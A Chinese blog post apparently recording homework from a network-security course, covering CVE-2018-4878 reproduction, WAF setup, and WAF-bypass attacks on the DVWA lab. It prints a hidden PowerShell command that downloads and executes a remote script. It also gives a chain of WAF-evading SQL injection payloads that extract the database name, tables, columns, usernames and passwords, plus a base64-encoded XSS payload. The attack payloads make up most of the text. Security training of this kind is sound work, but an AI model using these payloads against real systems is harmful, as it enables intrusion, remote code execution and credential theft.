首页 > 其他分享 >11.30

11.30

时间:2024-12-11 23:21:38浏览次数:9  
标签:23 WAF 0A 11.30 0A% --+ regexp

网络安全C10-2024.11.30@所有人

作业:

  1. CVE-2018-4878漏洞复现

powershell -windowstyle hidden -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://10.0.0.164:80/magedu.ps1');test.ps1"

  1. 实现WAF安装与配置

3、WAF绕过SQL注入

(1)分别在无WAF和有WAF的情况下,利用SQLMap进行注入,对比注入结果的区别

无waf情况

有waf情况

  1. 有WAF的情况下,手工注入出DVWA数据库中的user和password

查看字段 order by 被过滤,且用#显示报错用--+

使用联合注入 1' regexp "%0A%23" /*!union %0a select*/ 1,2 --+

数据库-1' regexp "%0A%23" /*!11144union%20%0A select*/1,DAtaBase(%0A /*!11144*/)--+

用户

-1' regexp "%0A%23" /*!union%20%0A select*/ 1,user(%0A /*!11144*/)--+

,版本,

id=1' regexp "%0A%23" /*!union %0A select*/ 1,/*!11445version*/(%0A /*!11445*/) --+

获取全部表名

id=-1' /*!11445union*/ /*!--+/*%0aselect/*!1,*/ group_concat(/*!11445table_name*/) /*!from*/

/*!--+/*%0ainformation_schema./*!tables*/ /*!where*/ /*!11445table_schema*/='dvwa' --+

获取字段名

id=-1' /*!11445union*/ /*!--+/*%0aselect/*!1,*/ group_concat(/*!11445column_name*/) /*!from*/

/*!--+/*%0ainformation_schema./*!columns*/ /*!where*/ /*!11445table_name*/='users' and /*!11445database*/(%0a /*!11445*/)='dvwa' --+

读数据

?id=-1' /*!11445union*/ /*!--+/*%0aselect/*!user,*/password from users --+

4、WAF绕过XSS实验

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnbmkgaGFvIHNodWFpJyk8L3NjcmlwdD4="

预习:了解提权的概念

预习资料:https://blog.csdn.net/qq_38684504/article/details/91359951

标签:23,WAF,0A,11.30,0A%,--+,regexp
From: https://www.cnblogs.com/maoming/p/18601189

相关文章

  • C#/.NET/.NET Core技术前沿周刊 | 第 15 期(2024年11.25-11.30)
    前言C#/.NET/.NETCore技术前沿周刊,你的每周技术指南针!记录、追踪C#/.NET/.NETCore领域、生态的每周最新、最实用、最有价值的技术文章、社区动态、优质项目和学习资源等。让你时刻站在技术前沿,助力技术成长与视野拓宽。欢迎投稿、推荐或自荐优质文章、项目、学习资源等......
  • 第七届传智杯初赛(第一场2024.11.30)
    |G|小红的数组操作(A组、B组)|采用二分法,确定答案的上下界,在二分检查中比较数组转化成mid最大所需的步骤与k的大小。注意若a[i]-mid%==0无需再加1,%>=1需要加1#include<bits/stdc++.h>usingnamespacestd;#defineintlonglongconstintN=1e5+10;in......
  • C#/.NET/.NET Core技术前沿周刊 | 第 15 期(2024年11.25-11.30)
    前言C#/.NET/.NETCore技术前沿周刊,你的每周技术指南针!记录、追踪C#/.NET/.NETCore领域、生态的每周最新、最实用、最有价值的技术文章、社区动态、优质项目和学习资源等。让你时刻站在技术前沿,助力技术成长与视野拓宽。欢迎投稿、推荐或自荐优质文章、项目、学习资源等。......
  • 11.30学习日记
    11.30学习日记oj跑项目报错如下查问题,改成java8这个路径也要改掉这里用的是木马程序测试路径改成我们正常测试的main.java就行运行成功......
  • 11.30考试总结
    分数T1T2T3T4T5T6T7100100100100100050T1杨辉三角每个\(dp\)的状态是\(dp_{i-1,j-1}\)与\(dp_{i-1,j}\)的和点击查看代码#include<bits/stdc++.h>#defineintlonglong#defineendl"\n"usingnamespacestd;constintmaxn=1e3+5;int......
  • 2024.11.30
    要在高亮的<em>标签中加入样式使字体变成红色,你可以直接在preTags和postTags中使用内联样式。具体做法如下:修改代码:request.source().highlighter(SearchSourceBuilder.highlight().field("name").preTags("<emstyle='color:red;'>")//......
  • 11.30《代码大全2》读后有感2
    对《代码大全2》深入研读的第二阶段,又有了不一样的体会,愈发觉得它是编程领域的“宝藏书籍”。书中提到的软件构建的原则,犹如基石般稳固且重要。它让我明白遵循合理原则去构建代码,软件项目才能站得稳、走得远。比如代码的复用性,不再是简单地重复使用代码片段,而是要有策略地进行规......
  • 2024.11.30 周六
    2024.11.30周六Q1.1200给定x(<=107),m(<=1018),循环i:1~m,t=i^x,问t为x或m因子的数量。Q2.1400给定n个数,选择四个坐标点组成一个边平行于坐标轴的矩形,问面积最大时选的点。Q3.1600给定一数组(非负),在非零数中每次可选一个数(代价本身)/相邻2个数(代价和的2倍)。问最小......
  • 2024.11.30
    连续两天从不同的人那里听到相同的话是什么感受?昨天晚上利用导师答疑时间和童老师谈话(目前接触到的统计系的老师们都好温柔),突发奇想问了他有关未来方向选择的问题。他和我介绍了他研究的领域,统计学确实再很多领域都能发挥作用呢。不过大一就决定未来的方向有点早,老师认为要先打好......
  • 基本的select语句(11.30)
    SQL的分类:DDL:数据定义语言。create、alter、drop、rename、truncate(清空)、DML:数据操作语言。insert、delete、update、selectDCL:数据控制语言。commit、rollback(撤销,回滚)、savepoint、grant、revokeSQL的规则:(必须遵守)SQL可以写在一行或者多行。为了提高可读性,各子句分行......